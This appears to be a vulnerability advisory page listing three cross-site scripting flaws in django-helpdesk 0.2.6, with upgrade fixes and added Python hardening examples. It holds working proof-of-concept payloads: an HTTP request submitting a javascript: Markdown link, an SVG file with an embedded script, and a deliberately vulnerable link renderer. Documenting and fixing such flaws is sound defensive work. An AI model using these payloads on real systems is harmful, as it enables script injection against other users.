django-helpdesk@0.2.6 vulnerabilities

Django-powered ticket tracker for your helpdesk

  • latest version

    1.3.0

  • latest non vulnerable version

  • first published

    13 years ago

  • latest version published

    1 month ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the django-helpdesk package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability | Vulnerable Version
    • H (High severity)
    Cross-site Scripting (XSS)

    django-helpdesk is a Django-powered ticket tracker for your helpdesk

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via Markdown in the Description or Comment field of a ticket. When rendering the Markdown to HTML, the application does not validate link targets, so a Markdown link whose URL uses the javascript: scheme is emitted as a clickable href, and the script runs in the browser of any user who views the ticket and clicks the link.

    PoC:

    POST /tickets/submit/ HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8080/tickets/submit/
    Content-Type: multipart/form-data; boundary=---------------------------69350364819088505273728279714
    Content-Length: 1161
    Origin: http://127.0.0.1:8080
    DNT: 1
    Connection: close
    Cookie: csrftoken=UQd46tUHKV3P08qcvIBTOBWDzS9nDZT8TDeCT6W8ThDUPLdWgKmlxwF3bBEGThC0
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="csrfmiddlewaretoken"
    
    o6SgjwQ9VozjIi2mYHAi5ImkD7UbKviMnTTO69SA4K9oxVP6JJlKOD5KfQpu0N1E
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="queue"
    
    1
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="title"
    
    XSS Markdown
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="body"
    
    [XSS](javascript:alert(`document.domain`))
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="priority"
    
    3
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="due_date"
    
    
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="attachment"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------69350364819088505273728279714
    Content-Disposition: form-data; name="submitter_email"
    
    xss@test.com
    -----------------------------69350364819088505273728279714--
    

    How to fix Cross-site Scripting (XSS)?

    Upgrade django-helpdesk to version 0.3.2 or higher.

    [,0.3.2)
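    The Markdown rendering defect above, reduced to a runnable example. This is added here and is not django-helpdesk's code: the renderer is a deliberately minimal stand-in that handles only `[text](url)` inline links, which is all the PoC needs. `render_link_vulnerable` reproduces the pre-fix behaviour of passing the link target straight into `href`; `render_link_safe` applies the check a practitioner would want, an allow-list of URL schemes (assumed policy: http, https, mailto) evaluated after stripping the control characters browsers ignore when parsing a scheme, plus HTML escaping of both the href and the label.

```python
import html
import re
from urllib.parse import urlsplit

# Minimal stand-in for a Markdown renderer: only [text](url) inline links,
# which is all the PoC above needs. The href decision is the part that matters.
LINK_RE = re.compile(r"\[([^\]]*)\]\(([^\s]*)\)")

# Assumed policy: schemes a ticket body may link to. Everything else is dropped.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers discard ASCII control characters and whitespace while parsing a
# scheme, so "java\tscript:" is still javascript: to them. Strip the same set
# before inspecting the scheme, otherwise the check can be bypassed.
_CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")


def render_link_vulnerable(text: str) -> str:
    """Pre-fix behaviour: the link target goes into href unchecked and unescaped."""
    return LINK_RE.sub(lambda m: f'<a href="{m.group(2)}">{m.group(1)}</a>', text)


def is_safe_url(url: str) -> bool:
    """Accept relative URLs and an explicit allow-list of schemes; reject all else."""
    scheme = urlsplit(_CONTROL_RE.sub("", url)).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


def render_link_safe(text: str) -> str:
    """Hardened: validate the scheme, then HTML-escape both href and label."""

    def repl(m: re.Match) -> str:
        label = html.escape(m.group(1), quote=True)
        url = m.group(2)
        if not is_safe_url(url):
            # Keep the visible text, drop the link.
            return label
        return f'<a href="{html.escape(url, quote=True)}">{label}</a>'

    return LINK_RE.sub(repl, text)


if __name__ == "__main__":
    # The ticket body from the PoC request above.
    body = "[XSS](javascript:alert(`document.domain`))"
    print("vulnerable:", render_link_vulnerable(body))
    print("hardened:  ", render_link_safe(body))
```

    Rejecting by allow-list rather than blocking `javascript:` by name is the point: `data:`, `vbscript:` and case or control-character variants all fall out of the same check without being enumerated.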
    • M (Medium severity)
    Cross-site Scripting (XSS)

    django-helpdesk is a Django-powered ticket tracker for your helpdesk

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via uploaded attachments in .svg or .html format. Such files can carry script, and when the attachment is rendered inline by the browser of a user who opens it, the script executes in the application's origin.

    PoC

    PoC.svg:
    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
       <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
       <script type="text/javascript">
          alert("XSS");
       </script>
    </svg>
    

    How to fix Cross-site Scripting (XSS)?

    Upgrade django-helpdesk to version 0.3.1 or higher.

    [,0.3.1)
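    A serving-side mitigation for the attachment issue, as an added example that is not the project's own code (the extension list and the header policy are assumptions): derive the response headers from the stored filename rather than the uploader-declared content type, force a download for anything a browser would execute as a document, and set nosniff so the browser cannot sniff an octet-stream back into HTML.

```python
import mimetypes
import os
from typing import Dict

# Extensions a browser will execute as a document in the serving origin when
# rendered inline. Assumed list; a deployment may need to extend it.
ACTIVE_EXTENSIONS = {
    ".html", ".htm", ".xhtml", ".shtml", ".mhtml", ".svg", ".svgz",
    ".xml", ".xsl", ".xslt", ".js", ".mjs",
}


def is_active_content(filename: str) -> bool:
    """True if a browser would render this file as active content."""
    return os.path.splitext(filename)[1].lower() in ACTIVE_EXTENSIONS


def attachment_headers(filename: str) -> Dict[str, str]:
    """Response headers for serving a user-uploaded ticket attachment.

    The MIME type is derived from the stored filename; the Content-Type the
    uploader declared in the multipart request is never trusted. Active content
    is downgraded to application/octet-stream, and every attachment is forced
    to download rather than render in the page.
    """
    if is_active_content(filename):
        content_type = "application/octet-stream"
    else:
        content_type = mimetypes.guess_type(filename)[0] or "application/octet-stream"
    # basename() strips any path the uploader smuggled in; a double quote would
    # break the header's quoted-string (non-ASCII names would need RFC 5987
    # filename*, omitted here).
    safe_name = os.path.basename(filename).replace('"', "")
    return {
        "Content-Type": content_type,
        # Download prompt instead of in-page rendering: the file never becomes
        # a document in the helpdesk's origin.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        # Without this, browsers may sniff octet-stream back into text/html.
        "X-Content-Type-Options": "nosniff",
        # Defence in depth if something upstream rewrites the headers above.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }


if __name__ == "__main__":
    for name in ("PoC.svg", "evil.html", "screenshot.png"):
        print(name, attachment_headers(name))
```

    Rejecting the extensions at upload time is a reasonable extra layer, but the serving headers are what actually stop the script from running, since an extension deny list is only as good as its coverage.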
    • H (High severity)
    Cross-site Scripting (XSS)

    django-helpdesk is a Django-powered ticket tracker for your helpdesk

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via lack of sanitization in the title of tickets created.

    How to fix Cross-site Scripting (XSS)?

    Upgrade django-helpdesk to version 0.3.1 or higher.

    [0,0.3.1)